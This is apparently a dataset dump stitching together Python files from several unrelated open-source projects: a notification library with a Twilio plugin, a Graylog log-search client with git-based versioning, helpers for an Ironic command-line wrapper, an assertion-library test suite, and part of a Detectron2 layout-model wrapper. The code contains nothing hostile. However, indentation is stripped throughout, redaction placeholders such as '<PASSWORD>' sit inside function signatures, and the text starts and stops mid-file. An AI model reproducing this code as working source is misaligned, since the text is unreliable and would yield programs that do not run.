fname (str): Path to the ini file we should use. If not provided, we
default to $HOME/.config/noterator/config.ini
Returns:
The parsed configuration
Raises:
ConfigurationError: if the file can't be found.
"""
if not fname:
fname = os.path.join(
os.getenv('HOME', ''), '.config', 'noterator', 'config.ini'
)
if not os.path.exists(fname):
        raise ConfigurationError(
"Unable to find configuration file."
)
config = ConfigParser()
config.read(fname)
return config
```
#### File: noterator/plugins/twilio.py
```python
from __future__ import absolute_import
import requests
REQUIRED_CONFIG = [
'account_sid', 'token', 'from_number', 'to_number',
]
BASE_URL = 'https://api.twilio.com/2010-04-01'
def notify(head, body, **kwargs):
account_sid = kwargs['account_sid']
token = kwargs['token']
from_number = kwargs['from_number']
to_number = kwargs['to_number']
url = '{}/Accounts/{}/Messages.json'.format(BASE_URL, account_sid)
payload = {
"From": from_number,
"To": to_number,
"Body": "{}: {}".format(head, body),
}
auth = (account_sid, token)
requests.post(url, payload, auth=auth)
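# A minimal usage sketch; the values are hypothetical, and in noterator these
# kwargs are normally supplied from the plugin's configuration section:
#
#   notify("noterator", "Iteration finished",
#          account_sid="ACxxxxxxxxxxxxxxxx", token="auth-token",
#          from_number="+15550100", to_number="+15550101")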
```
#### File: noterator/tests/test_email_plugin.py
```python
import mock
import unittest
from email.mime.text import MIMEText
from freezegun import freeze_time
from noterator import Noterator, EMAIL
class TestEmailPlugin(unittest.TestCase):
@freeze_time("2016-10-01 09:20:00")
@mock.patch('noterator.plugins.email.smtplib')
def test_email_settings(self, smtplib):
cfg = {
'recipient': '<EMAIL>',
'from_mail': '<EMAIL>',
'host': 'smtp.example.com',
'port': '250', # not 25 because that's the default value
'username': 'smtpuser',
'password': '<PASSWORD>',
}
smtp = mock.Mock()
smtplib.SMTP = mock.Mock(return_value=smtp)
n = Noterator(range(5), EMAIL, config_file=None)
n.configure_plugin('email', **cfg)
for _ in n:
pass
msg = MIMEText(n._get_body(EMAIL, finished=True))
msg['Subject'] = n.head
msg['From'] = cfg['from_mail']
msg['To'] = cfg['recipient']
smtplib.SMTP.assert_called_once_with(cfg['host'], cfg['port'])
smtp.sendmail.assert_called_once_with(
cfg['from_mail'], [cfg['recipient']], msg.as_string(),
)
```
#### File: noterator/tests/test_utils.py
```python
import unittest
from noterator.utils import catch_all
class TestUtils(unittest.TestCase):
def test_catch_all(self):
@catch_all
def exceptional_function():
raise Exception("No-one should notice this")
try:
exceptional_function()
except Exception:
self.fail("Exception not caught")
```
#### File: noterator/tests/utils.py
```python
import os
from noterator import Noterator
def get_config_path(fname):
return os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'data',
fname,
)
def all_available_methods():
# Take a list of, e.g [EMAIL, HIPCHAT, TWILIO] and turn it into
# EMAIL|HIPCHAT|TWILIO
available_methods = [method for (method, _, _) in Noterator.methods]
method = available_methods.pop(0)
while len(available_methods):
method |= available_methods.pop(0)
return method
``` |
{
"source": "jimrobinson/bonfire",
"score": 2
} |
#### File: bonfire/bonfire/graylog_api.py
```python
import requests
import arrow
import syslog
from .dateutils import datetime_converter
class Message(object):
def __init__(self, message_dict={}):
self.message_dict = dict(message_dict["message"])
self.timestamp = arrow.get(self.message_dict.get("timestamp", None))
self.level = self.message_dict.get("level", syslog.LOG_INFO)
self.message = self.message_dict.get("message", "")
def simple_formatted(self):
return "[{}] {}: {}".format(self.timestamp, self.level, self.message)
class SearchResult(object):
def __init__(self, result_dict={}):
self.query = result_dict.get("query", None)
self.query_object = None
self.used_indices = result_dict.get("used_indices", None)
self.queried_range = result_dict.get("queried_range", None)
self.range_from = arrow.get(result_dict.get("from", None))
self.range_to = arrow.get(result_dict.get("to", None))
self.range_duration = result_dict.get("time", None)
self.fields = result_dict.get("fields", [])
self.total_results = result_dict.get("total_results", None)
self.messages = list(map(Message, result_dict.get("messages", [])))
def simple_formatted(self):
return "\n".join(map(lambda m: m.simple_formatted(), self.messages))
class SearchRange(object):
def __init__(self, from_time=None, to_time=None, relative=False):
self.from_time = datetime_converter(from_time)
self.to_time = datetime_converter(to_time)
self.relative = relative
def is_relative(self):
return self.relative
def range_in_seconds(self):
if self.is_relative():
range = arrow.now('local').timestamp - self.from_time.timestamp
else:
range = (self.to_time - self.from_time).seconds
if range < 1:
return 1
return range
class SearchQuery(object):
def __init__(self, search_range, query="*", limit=None, offset=None, filter=None, fields=None, sort=None,
ascending=False):
self.search_range = search_range
self.query = query
self.limit = limit
self.offset = offset
self.filter = filter
self.fields = fields
self.sort = sort
self.ascending = ascending
def copy_with_range(self, search_range):
q = SearchQuery(search_range, self.query, self.limit, self.offset, self.filter, self.fields, self.sort,
self.ascending)
return q
class GraylogAPI(object):
def __init__(self, host, port, endpoint, username, password=<PASSWORD>, host_tz='utc', default_stream=None, scheme='http',
proxies=None):
endpoint = '/' + endpoint.strip('/')
self.host = host
self.port = port
self.endpoint = endpoint
self.username = username
self.password = password
self.host_tz = host_tz
self.default_stream = default_stream
self.proxies = proxies
self.get_header = {"Accept": "application/json"}
self.base_url = "{scheme}://{host}:{port}{endpoint}".format(host=host, port=port, scheme=scheme,
endpoint=endpoint)
if self.base_url[-1] != '/':
self.base_url += '/'
def __str__(self):
name = "{host}:{port}".format(host=self.host, port=self.port)
if self.endpoint != '/':
name += self.endpoint
return name
def get(self, url, **kwargs):
params = {}
for label, item in kwargs.items():
if isinstance(item, list):
params[label + "[]"] = item
else:
params[label] = item
r = requests.get(self.base_url + url, params=params, headers=self.get_header,
auth=(self.username, self.password), proxies=self.proxies)
if r.status_code == requests.codes.ok:
return r.json()
else:
r.raise_for_status()
def search(self, query, fetch_all=False):
sort = None
if query.sort is not None:
if query.ascending:
sort = query.sort + ":asc"
else:
sort = query.sort + ":desc"
if fetch_all and query.limit is None:
result = self.search_raw(query.query, query.search_range, 1, query.offset,
query.filter, query.fields, sort)
sr = SearchRange(from_time=result.range_from, to_time=result.range_to)
if result.total_results > 10000:
raise RuntimeError("Query returns more than 10000 log entries. Use offsets to query in chunks.")
result = self.search_raw(query.query, sr, result.total_results, query.offset,
query.filter, query.fields, sort)
else:
result = self.search_raw(query.query, query.search_range, query.limit, query.offset,
query.filter, query.fields, sort)
result.query_object = query
return result
def user_info(self, username):
url = "users/" + username
return self.get(url=url)
def streams(self):
url = "streams"
return self.get(url=url)
def search_raw(self, query, search_range, limit=None, offset=None, filter=None, fields=None, sort=None):
url = "search/universal/"
range_args = {}
if filter is None and self.default_stream is not None:
filter = "streams:{}".format(self.default_stream)
if search_range.is_relative():
url += "relative"
range_args["range"] = search_range.range_in_seconds()
else:
url += "absolute"
range_args["from"] = search_range.from_time.to(self.host_tz).format("YYYY-MM-DD HH:mm:ss.SSS")
if search_range.to_time is None:
to_time = arrow.now(self.host_tz)
else:
to_time = search_range.to_time.to(self.host_tz)
range_args["to"] = to_time.format("YYYY-MM-DD HH:mm:ss.SSS")
if fields is not None:
fields = ",".join(fields)
result = self.get(
url=url,
query=query,
limit=limit,
offset=offset,
filter=filter,
fields=fields,
sort=sort,
**range_args)
return SearchResult(result)
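# A minimal usage sketch; host, credentials and the query string are hypothetical,
# and it assumes dateutils.datetime_converter accepts arrow/datetime values:
#
#   api = GraylogAPI("graylog.example.com", 443, "/api", "alice", password="secret",
#                    scheme="https")
#   sr = SearchRange(from_time=arrow.now().shift(hours=-1), relative=True)
#   result = api.search(SearchQuery(search_range=sr, query="source:web-01", limit=50))
#   print(result.simple_formatted())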
```
#### File: bonfire/bonfire/_version.py
```python
import inspect
import os
import re
import subprocess
import sys
__location__ = os.path.join(os.getcwd(), os.path.dirname(
inspect.getfile(inspect.currentframe())))
# these strings will be replaced by git during git-archive
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
# general settings
tag_prefix = 'v' # tags are like v1.2.0
package = "bonfire"
namespace = []
root_pkg = namespace[0] if namespace else package
if namespace:
pkg_path = os.path.join(*namespace[-1].split('.') + [package])
else:
pkg_path = package
class ShellCommand(object):
def __init__(self, command, shell=True, cwd=None):
self._command = command
self._shell = shell
self._cwd = cwd
def __call__(self, *args):
command = "{cmd} {args}".format(cmd=self._command,
args=subprocess.list2cmdline(args))
output = subprocess.check_output(command,
shell=self._shell,
cwd=self._cwd,
stderr=subprocess.STDOUT,
universal_newlines=True)
return self._yield_output(output)
def _yield_output(self, msg):
for line in msg.splitlines():
yield line
def get_git_cmd(**args):
if sys.platform == "win32":
for cmd in ["git.cmd", "git.exe"]:
git = ShellCommand(cmd, **args)
try:
git("--version")
except (subprocess.CalledProcessError, OSError):
continue
return git
return None
else:
git = ShellCommand("git", **args)
try:
git("--version")
except (subprocess.CalledProcessError, OSError):
return None
return git
def version_from_git(tag_prefix, root, verbose=False):
# this runs 'git' from the root of the source tree. This only gets called
# if the git-archive 'subst' keywords were *not* expanded, and
# _version.py hasn't already been rewritten with a short version string,
# meaning we're inside a checked out source tree.
git = get_git_cmd(cwd=root)
if not git:
print("no git found")
return None
try:
tag = next(git("describe", "--tags", "--dirty", "--always"))
except subprocess.CalledProcessError:
return None
if not tag.startswith(tag_prefix):
if verbose:
print("tag '{}' doesn't start with prefix '{}'".format(tag,
tag_prefix))
return None
tag = tag[len(tag_prefix):]
sha1 = next(git("rev-parse", "HEAD"))
full = sha1.strip()
if tag.endswith("-dirty"):
full += "-dirty"
return {"version": tag, "full": full}
def get_keywords(versionfile_abs):
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = dict()
try:
with open(versionfile_abs, "r") as fh:
for line in fh.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
except EnvironmentError:
return None
return keywords
def version_from_keywords(keywords, tag_prefix, verbose=False):
if not keywords:
return None # keyword-finding function failed to find keywords
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
return None # unexpanded, so not in an unpacked git-archive tarball
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '{}', no digits".format(",".join(refs-tags)))
if verbose:
print("likely tags: {}".format(",".join(sorted(tags))))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking {}".format(r))
return {"version": r,
"full": keywords["full"].strip()}
else:
if verbose:
print("no suitable tags, using full revision id")
return {"version": keywords["full"].strip(),
"full": keywords["full"].strip()}
def version_from_parentdir(parentdir_prefix, root, verbose=False):
# Source tarballs conventionally unpack into a directory that includes
# both the project name and a version string.
dirname = os.path.basename(root)
if not dirname.startswith(parentdir_prefix):
if verbose:
print("guessing rootdir is '{}', but '{}' doesn't start with "
"prefix '{}'".format(root, dirname, parentdir_prefix))
return None
version = dirname[len(parentdir_prefix):].split('-')[0]
return {"version": version, "full": ""}
def git2pep440(ver_str):
dash_count = ver_str.count('-')
if dash_count == 0:
return ver_str
elif dash_count == 1:
return ver_str.split('-')[0] + "+dirty"
elif dash_count == 2:
tag, commits, sha1 = ver_str.split('-')
return "{}.post0.dev{}+{}".format(tag, commits, sha1)
elif dash_count == 3:
tag, commits, sha1, _ = ver_str.split('-')
return "{}.post0.dev{}+{}.dirty".format(tag, commits, sha1)
else:
raise RuntimeError("Invalid version string")
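# Illustrative mappings implemented by git2pep440 (tag_prefix already stripped):
#   "1.2.0"                  -> "1.2.0"
#   "1.2.0-dirty"            -> "1.2.0+dirty"
#   "1.2.0-3-g1a2b3c4"       -> "1.2.0.post0.dev3+g1a2b3c4"
#   "1.2.0-3-g1a2b3c4-dirty" -> "1.2.0.post0.dev3+g1a2b3c4.dirty"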
def get_versions(verbose=False):
vcs_kwds = {"refnames": git_refnames, "full": git_full}
parentdir = package + '-'
root = __location__
# pkg_path is the relative path from the top of the source
# tree (where the .git directory might live) to this file.
# Invert this to find the root of our package.
for _ in pkg_path.split(os.sep):
root = os.path.dirname(root)
# different version retrieval methods as (method, args, comment)
ver_retrieval = [
(version_from_keywords, (vcs_kwds, tag_prefix, verbose),
'expanded keywords'),
(version_from_parentdir, (parentdir, root, verbose), 'parentdir'),
(version_from_git, (tag_prefix, root, verbose), 'git')
]
for method, args, comment in ver_retrieval:
ver = method(*args)
if ver:
if verbose:
print("got version from {}".format(comment))
break
else:
ver = {"version": "unknown", "full": ""}
ver['version'] = git2pep440(ver['version'])
return ver
``` |
{
"source": "jimrollenhagen/superironic",
"score": 2
} |
#### File: superironic/superironic/utils.py
```python
from superironic import colors
from superironic import config
def get_envs_in_group(group_name):
"""
Takes a group_name and finds any environments that have a SUPERIRONIC_GROUP
configuration line that matches the group_name.
"""
envs = []
for section in config.ironic_creds.sections():
if (config.ironic_creds.has_option(section, 'SUPERIRONIC_GROUP') and
config.ironic_creds.get(section,
'SUPERIRONIC_GROUP') == group_name):
envs.append(section)
return envs
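# For illustration, a config with two sections sharing a group (names are made up):
#
#   [prod]
#   SUPERIRONIC_GROUP = production
#   [prod-backup]
#   SUPERIRONIC_GROUP = production
#
# get_envs_in_group('production') would then return ['prod', 'prod-backup'].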
def is_valid_environment(env):
"""Check if config file contains `env`."""
valid_envs = config.ironic_creds.sections()
return env in valid_envs
def is_valid_group(group_name):
"""
Checks to see if the configuration file contains a SUPERIRONIC_GROUP
configuration option.
"""
valid_groups = []
for section in config.ironic_creds.sections():
if config.ironic_creds.has_option(section, 'SUPERIRONIC_GROUP'):
valid_groups.append(config.ironic_creds.get(section,
'SUPERIRONIC_GROUP'))
valid_groups = list(set(valid_groups))
if group_name in valid_groups:
return True
else:
return False
def print_valid_envs(valid_envs):
"""Prints the available environments."""
print("[%s] Your valid environments are:" %
(colors.gwrap('Found environments')))
print("%r" % valid_envs)
def warn_missing_ironic_args():
"""Warn user about missing Ironic arguments."""
msg = """
[%s] No arguments were provided to pass along to ironic.
The superironic script expects to get commands structured like this:
superironic [environment] [command]
Here are some example commands that may help you get started:
superironic prod node-list
superironic prod node-show
superironic prod port-list
"""
print(msg % colors.rwrap('Missing arguments'))
def rm_prefix(name):
"""
Removes ironic_ os_ ironicclient_ prefix from string.
"""
if name.startswith('ironic_'):
return name[7:]
elif name.startswith('ironicclient_'):
return name[13:]
elif name.startswith('os_'):
return name[3:]
else:
return name
``` |
{
"source": "jimrpg00/steamkeys",
"score": 3
} |
#### File: jimrpg00/steamkeys/MyHelp.py
```python
import discord
from discord.ext import commands
class MyHelp(commands.HelpCommand):
def get_command_brief(self, command):
return command.short_doc or "Command is not documented."
def get_command_signature(self, command):
return '%s%s %s' % (self.clean_prefix, command.qualified_name, command.signature)
# !help
async def send_bot_help(self, mapping):
embed = discord.Embed(title="JimRPG Steam Key Depository - Commands")
        for cog, cog_commands in mapping.items():
            command_signatures = [self.get_command_signature(c) for c in cog_commands]
            for co in cog_commands:
print(co.brief)
cog_name = getattr(cog, "qualified_name", "No Category")
description = getattr(cog, "description", "No Description")
print(description)
brief = getattr(co, "brief", "This command is not documented")
embed.add_field(name=cog_name, value=f"{brief}\nUsage: {self.get_command_signature(co)}", inline=False)
# if command_signatures:
# print(cog)
# cog_name = getattr(cog, "qualified_name", "No Category")
# embed.add_field(name=cog_name, value="\n".join(command_signatures), inline=False)
channel = self.get_destination()
await channel.send(embed=embed)
# !help <command>
async def send_command_help(self, command):
await self.context.send("This is help command")
# !help <group>
async def send_group_help(self, group):
await self.context.send("This is help group")
# !help <cog>
async def send_cog_help(self, cog):
print(cog)
description = getattr(cog, "description", "No Description")
channel = self.get_destination()
await channel.send(f"{description}")
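# A minimal wiring sketch (prefix and token are placeholders); discord.py uses a
# custom help command once it is assigned to the bot instance:
#
#   bot = commands.Bot(command_prefix="!", intents=discord.Intents.default())
#   bot.help_command = MyHelp()
#   bot.run("YOUR_TOKEN")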
``` |
{
"source": "jimr/testy",
"score": 3
} |
#### File: testy/tests/test_assertions.py
```python
from __future__ import with_statement
import re
import unittest
from datetime import datetime
from testy.assertions import (
assert_raises, assert_raises_and_contains, assert_equal,
assert_almost_equal, assert_within_tolerance, assert_not_equal, assert_lt,
assert_lte, assert_gt, assert_gte, assert_in_range, assert_between,
assert_in, assert_not_in, assert_all_in, assert_starts_with,
assert_not_reached, assert_rows_equal, assert_length,
assert_is, assert_is_not, assert_all_match_regex, assert_match_regex,
assert_any_match_regex, assert_all_not_match_regex, assert_sets_equal,
assert_dicts_equal, assert_dict_subset, assert_subset, assert_list_prefix,
assert_sorted_equal, assert_isinstance, assert_datetimes_equal,
assert_exactly_one
)
class PositiveAssertionsTestCase(unittest.TestCase):
"""Test all assertions with the expectation of them all passing."""
def test_assert_raises(self):
with assert_raises(TypeError):
raise TypeError()
with assert_raises(Exception):
raise TypeError()
def raise_it():
raise Exception()
assert_raises(Exception, raise_it)
def test_assert_raises_and_contains(self):
def fail():
raise ValueError("choose one of the correct values")
assert_raises_and_contains(ValueError, "one of", fail)
def test_assert_equal(self):
assert_equal(1, 1)
assert_equal("abc", "abc")
assert_equal(self, self)
def test_assert_almost_equal(self):
assert_almost_equal(1, 1, 1)
assert_almost_equal(1, 1.01, 1)
assert_almost_equal(0.99, 1, 1)
assert_almost_equal(1, 1.001, 2)
def test_assert_within_tolerance(self):
assert_within_tolerance(5, 5.1, 0.2)
def test_assert_not_equal(self):
assert_not_equal(1, 2)
class A(object):
pass
assert_not_equal(A(), A())
def test_assert_lt(self):
assert_lt(1, 2)
assert_lt(1.0, 1.01)
assert_lt('a', 'b')
assert_lt(False, True)
def test_assert_lte(self):
assert_lte(1, 1)
assert_lte(1, 2)
assert_lte(1.0, 1.01)
assert_lte('a', 'b')
assert_lte(False, True)
assert_lte(False, False)
def test_assert_gt(self):
assert_gt(2, 1)
assert_gt(1.01, 1.0)
assert_gt('b', 'a')
assert_gt(True, False)
def test_assert_gte(self):
assert_gte(1, 1)
assert_gte(2, 1)
assert_gte(1.01, 1.0)
assert_gte('b', 'a')
assert_gte(True, False)
assert_gte(False, False)
def test_assert_in_range(self):
assert_in_range(3, 1, 5)
assert_in_range(3, 1, 3, inclusive=True)
def test_assert_between(self):
assert_between(1, 3, 5)
assert_between(1, 3, 3)
def test_assert_in(self):
assert_in(2, [1, 2, 3])
assert_in('b', 'abc')
def test_assert_not_in(self):
assert_not_in(1, [2, 3, 4])
assert_not_in('a', 'bcd')
def test_assert_all_in(self):
assert_all_in([2, 3, 4], [1, 2, 3, 4, 5, 6])
assert_all_in('bc1', 'abc123')
def test_assert_starts_with(self):
assert_starts_with([1, 2, 3, 4, 5, 6], [1, 2, 3])
assert_starts_with('abcdef', 'abc')
def test_assert_not_reached(self):
try:
assert_not_reached()
except AssertionError:
pass
def test_assert_rows_equal(self):
row1 = dict(a=1, b=2)
row2 = dict(b=2, a=1)
assert_rows_equal([row1, row2], [row2, row1])
row1 = [1, 2]
row2 = [3, 4]
assert_rows_equal([row1, row2], [row2, row1])
def test_assert_length(self):
assert_length('abc', 3)
def test_assert_is(self):
x = 3
y = x
assert_is(x, y)
x = 300
assert_is(x, 300)
assert_is(None, None)
from testy.aliases import eq
assert_is(eq, assert_equal)
def test_assert_is_not(self):
assert_is_not(assert_is, assert_is_not)
assert_is_not('abc', list('abc'))
l = [1, 2, 3]
assert_is_not(l, l[:])
def test_assert_all_match_regex(self):
values = [
'abc',
'123 abc def',
]
pattern = re.compile(r'\w+')
assert_all_match_regex(pattern, values)
def test_assert_match_regex(self):
pattern = re.compile(r'\w+')
assert_match_regex(pattern, 'abc 123')
def test_assert_any_match_regex(self):
values = [
'"$',
'abc',
'@#~',
]
pattern = re.compile(r'\w+')
assert_any_match_regex(pattern, values)
def test_assert_all_not_match_regex(self):
values = [
'"$',
'@#~',
]
pattern = re.compile(r'\w+')
assert_all_not_match_regex(pattern, values)
def test_assert_sets_equal(self):
s1 = set(['a', 'b', 'c', 1, 2, 3])
s2 = set([1, 'a', 3, 'b', 'c', 2])
assert_sets_equal(s1, s2)
def test_assert_dicts_equal(self):
d1 = dict(a=3, b=True, c=None)
d2 = dict(b=True, c=None, a=3)
assert_dicts_equal(d1, d2)
d1 = dict(a=3, b=True, c=None, d=4)
d2 = dict(b=True, c=None, a=3)
assert_dicts_equal(d1, d2, ignore_keys=['d'])
def test_assert_dict_subset(self):
d1 = dict(b=True)
d2 = dict(a=3, b=True, c=None)
assert_dict_subset(d1, d2)
def test_assert_subset(self):
s1 = set([3, 'b', 'c', 2])
s2 = set(['a', 'b', 'c', 1, 2, 3])
assert_subset(s1, s2)
def test_assert_list_prefix(self):
l1 = [1, 2, 3]
l2 = [1, 2, 3, 'a', 'b', 'c']
assert_list_prefix(l1, l2)
def test_assert_sorted_equal(self):
s1 = set(['a', 'b', 'c'])
s2 = set(['b', 'c', 'a'])
assert_sorted_equal(s1, s2)
def test_assert_isinstance(self):
class A(object):
pass
assert_isinstance(A(), A)
assert_isinstance(dict(a=1), dict)
def test_assert_datetimes_equal(self):
# times are compared to the millisecond, so this ought to pass
t0 = datetime.now()
t1 = datetime.now()
assert_datetimes_equal(t0, t1)
t0 = datetime(1970, 1, 1)
t1 = datetime(1970, 1, 1)
assert_datetimes_equal(t0, t1)
def test_assert_exactly_one(self):
assert_exactly_one(None, False, None, None)
assert_exactly_one(None, True, None, None)
class NegativeAssertionsTestCase(unittest.TestCase):
"""Test all assertions with the expectation of them all failing."""
def test_assert_raises(self):
class MyException(Exception):
pass
with assert_raises(AssertionError):
with assert_raises(TypeError):
raise MyException()
with assert_raises(AssertionError):
with assert_raises(Exception):
pass
def test_assert_raises_and_contains(self):
def no_fail():
return
def fail():
raise ValueError("choose one of the correct values")
with assert_raises(AssertionError):
assert_raises_and_contains(ValueError, "two of", fail)
with assert_raises(AssertionError):
assert_raises_and_contains(Exception, "anything", no_fail)
def test_assert_equal(self):
with assert_raises(AssertionError):
assert_equal(1, 2)
def test_assert_almost_equal(self):
with assert_raises(AssertionError):
assert_almost_equal(1, 1.01, 2)
def test_assert_within_tolerance(self):
with assert_raises(AssertionError):
assert_within_tolerance(5, 5.1, 0.01)
def test_assert_not_equal(self):
with assert_raises(AssertionError):
assert_not_equal(1, 1)
def test_assert_lt(self):
with assert_raises(AssertionError):
assert_lt(3, 2)
def test_assert_lte(self):
with assert_raises(AssertionError):
assert_lte(10, 1)
def test_assert_gt(self):
with assert_raises(AssertionError):
assert_gt(1, 4)
def test_assert_gte(self):
with assert_raises(AssertionError):
assert_gte(3, 5)
def test_assert_in_range(self):
with assert_raises(AssertionError):
assert_in_range(1, 2, 4)
def test_assert_between(self):
with assert_raises(AssertionError):
assert_between(1, 3, 2)
def test_assert_in(self):
with assert_raises(AssertionError):
assert_in('a', [1, 2, 3])
def test_assert_not_in(self):
with assert_raises(AssertionError):
assert_not_in(1, [1, 2, 3])
def test_assert_all_in(self):
with assert_raises(AssertionError):
assert_all_in([1, 2], [1, 3])
def test_assert_starts_with(self):
with assert_raises(AssertionError):
assert_starts_with('abc123', 'bc')
def test_assert_not_reached(self):
# The only way to test this assertion negatively is to not reach it :)
pass
def test_assert_rows_equal(self):
with assert_raises(AssertionError):
row1 = dict(a=1, b=2)
row2 = dict(b=3, a=1)
row3 = dict(b=1, a=1)
assert_rows_equal([row1, row2], [row2, row3])
def test_assert_length(self):
with assert_raises(AssertionError):
assert_length('abc', 4)
def test_assert_is(self):
with assert_raises(AssertionError):
assert_is(True, False)
def test_assert_is_not(self):
with assert_raises(AssertionError):
assert_is_not(True, True)
def test_assert_all_match_regex(self):
with assert_raises(AssertionError):
values = [
'$%`',
'123 abc def',
]
pattern = re.compile(r'\w+')
assert_all_match_regex(pattern, values)
def test_assert_match_regex(self):
with assert_raises(AssertionError):
pattern = re.compile(r'\w+')
assert_match_regex(pattern, '$')
def test_assert_any_match_regex(self):
with assert_raises(AssertionError):
values = [
'"$',
'@#~',
]
pattern = re.compile(r'\w+')
assert_any_match_regex(pattern, values)
def test_assert_all_not_match_regex(self):
with assert_raises(AssertionError):
values = [
'"$',
'abc',
'@#~',
]
pattern = re.compile(r'\w+')
assert_all_not_match_regex(pattern, values)
def test_assert_sets_equal(self):
with assert_raises(AssertionError):
assert_sets_equal(set([1, 2, 3]), set([1, 'b', 'c']))
def test_assert_dicts_equal(self):
class A(object):
pass
with assert_raises(AssertionError):
assert_dicts_equal(
dict(a=[1, 2], b=dict(c=1), c=A(), d=(1, 2, 3)),
dict(a=[1, 2, 3], b=dict(d=2), c=A(), d=(1, 2))
)
def test_assert_dict_subset(self):
with assert_raises(AssertionError):
assert_dict_subset(dict(a=2), dict(b=3))
def test_assert_subset(self):
with assert_raises(AssertionError):
assert_subset(set([1, 2, 3]), set([1, 2]))
def test_assert_list_prefix(self):
with assert_raises(AssertionError):
assert_list_prefix([1, 2, 3], [4, 5, 6])
def test_assert_sorted_equal(self):
with assert_raises(AssertionError):
assert_sorted_equal([1, 2, 3], [3, 2, 3])
def test_assert_isinstance(self):
with assert_raises(AssertionError):
assert_isinstance(dict(), list)
def test_assert_datetimes_equal(self):
with assert_raises(AssertionError):
assert_datetimes_equal(datetime(1970, 1, 1), datetime.now())
def test_assert_exactly_one(self):
with assert_raises(AssertionError):
assert_exactly_one(True, False, None, 1)
class FailureAssertionsTestCase(unittest.TestCase):
"""Throw garbage at assertions to trip them over."""
def test_assert_starts_with(self):
with assert_raises(TypeError):
assert_starts_with(False, 'abc123')
with assert_raises(TypeError):
assert_starts_with('abc123', False)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "Jim-Salmons/layout-parser",
"score": 3
} |
#### File: layoutparser/models/base_catalog.py
```python
from iopath.common.file_io import HTTPURLHandler
from iopath.common.file_io import PathManager as PathManagerBase
# A trick learned from https://github.com/facebookresearch/detectron2/blob/65faeb4779e4c142484deeece18dc958c5c9ad18/detectron2/utils/file_io.py#L3
class DropboxHandler(HTTPURLHandler):
"""
Supports download and file check for dropbox links
"""
def _get_supported_prefixes(self):
return ["https://www.dropbox.com"]
def _isfile(self, path):
return path in self.cache_map
PathManager = PathManagerBase()
PathManager.register_handler(DropboxHandler())
```
#### File: layoutparser/models/base_layoutmodel.py
```python
from abc import ABC, abstractmethod
import os
import importlib
class BaseLayoutModel(ABC):
@property
@abstractmethod
def DETECTOR_NAME(self):
pass
@abstractmethod
def detect(self):
pass
# Add lazy loading mechanisms for layout models, refer to
# layoutparser.ocr.BaseOCRAgent
# TODO: Build a metaclass for lazy module loader
@property
@abstractmethod
def DEPENDENCIES(self):
"""DEPENDENCIES lists all necessary dependencies for the class."""
pass
@property
@abstractmethod
def MODULES(self):
"""MODULES instructs how to import these necessary libraries."""
pass
@classmethod
def _import_module(cls):
for m in cls.MODULES:
if importlib.util.find_spec(m["module_path"]):
setattr(
cls, m["import_name"], importlib.import_module(m["module_path"])
)
else:
raise ModuleNotFoundError(
f"\n "
f"\nPlease install the following libraries to support the class {cls.__name__}:"
f"\n pip install {' '.join(cls.DEPENDENCIES)}"
f"\n "
)
def __new__(cls, *args, **kwargs):
cls._import_module()
return super().__new__(cls)
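# For illustration, a hypothetical backend would subclass BaseLayoutModel like this
# (library and module names are made up; _import_module attaches the imported
# module to the class under "import_name" before __init__ runs):
#
#   class ExampleLayoutModel(BaseLayoutModel):
#       DETECTOR_NAME = "example"
#       DEPENDENCIES = ["examplelib"]
#       MODULES = [{"import_name": "_examplelib", "module_path": "examplelib"}]
#
#       def detect(self, image):
#           return self._examplelib.run(image)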
```
#### File: models/detectron2/layoutmodel.py
```python
from PIL import Image
import numpy as np
import torch
from .catalog import PathManager, LABEL_MAP_CATALOG
from ..base_layoutmodel import BaseLayoutModel
from ...elements import Rectangle, TextBlock, Layout
__all__ = ["Detectron2LayoutModel"]
class Detectron2LayoutModel(BaseLayoutModel):
"""Create a Detectron2-based Layout Detection Model
Args:
config_path (:obj:`str`):
The path to the configuration file.
model_path (:obj:`str`, None):
The path to the saved weights of the model.
If set, overwrite the weights in the configuration file.
Defaults to `None`.
label_map (:obj:`dict`, optional):
            The map from the model prediction (ids) to real-world
            labels (strings). If the config is from one of the supported
datasets, Layout Parser will automatically initialize the label_map.
Defaults to `None`.
enforce_cpu(:obj:`bool`, optional):
When set to `True`, it will enforce using cpu even if it is on a CUDA
available device.
extra_config (:obj:`list`, optional):
Extra configuration passed to the Detectron2 model
configuration. The argument will be used in the `merge_from_list
<https://detectron2.readthedocs.io/modules/config.html
#detectron2.config.CfgNode.merge_from_list>`_ function.
Defaults to `[]`.
Examples::
>>> import layoutparser as lp
>>> model = lp.models.Detectron2LayoutModel('lp://HJDataset/faster_rcnn_R_50_FPN_3x/config')
>>> model.detect(image)
"""
DEPENDENCIES = ["detectron2"]
MODULES = [
{
"import_name": "_engine",
"module_path": "detectron2.engine",
},
{"import_name": "_config", "module_path": "detectron2.config"},
]
DETECTOR_NAME = "detectron2"
def __init__(
self,
config_path,
model_path=None,
label_map=None,
extra_config=[],
enforce_cpu=False,
):
if config_path.startswith("lp://") and label_map is None:
            dataset_name = config_path[len("lp://"):].split("/")[0]
label_map = LABEL_MAP_CATALOG[dataset_name]
if enforce_cpu:
extra_config.extend(["MODEL.DEVICE", "cpu"])
